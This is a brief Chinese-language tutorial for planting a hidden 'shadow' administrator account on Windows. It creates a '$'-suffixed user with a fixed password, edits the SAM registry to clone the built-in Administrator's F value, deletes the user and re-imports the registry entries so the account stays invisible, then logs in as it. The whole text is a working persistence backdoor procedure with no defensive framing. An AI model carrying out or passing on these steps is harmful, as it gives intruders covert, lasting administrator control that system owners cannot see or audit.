1.创建用户
net user test$ sxf!7890 /add
net localgroup administrators test$ /add
cmd里
2.观察test$用户
在计算机管理里面找到本地用户和组,选择test$
然而我们从cmd打命令却无法查看
3.导出test$和administrator用户注册表信息
先打开注册表,命令行输入regedit,之后找到SAM.打开权限,将Administrators权限设置
刷信权限
之后导出test$用户信息
(记住类型的值)
将其与其的值类型值导出
导出administarator的UID项
(UID固定为1F4
四:修改导出注册表信息
1、将admin_id中的F值,复制到uid中的F值
编辑admin_id
保存,
五、删除test$用户,导入注册表
1、删除test$用户
使用下面命令
net user test$ /del
2、导入桌面上的 test 和 uid注册表文件
导入test
导入uid
六、查看隐藏账户
1、使用计算机管理,查看用户,并未发现test$
2、修改组策略,允许自定义用户登录
在命令提示符中输入
gpedit.msc
定位到安全选项,不显示最后的用户名
注销adminstrator用户
使用test$用户登录
输入用户名 test$
输入密码sxf!7890
登录成功
使用任务管理器,查看当前用户
成功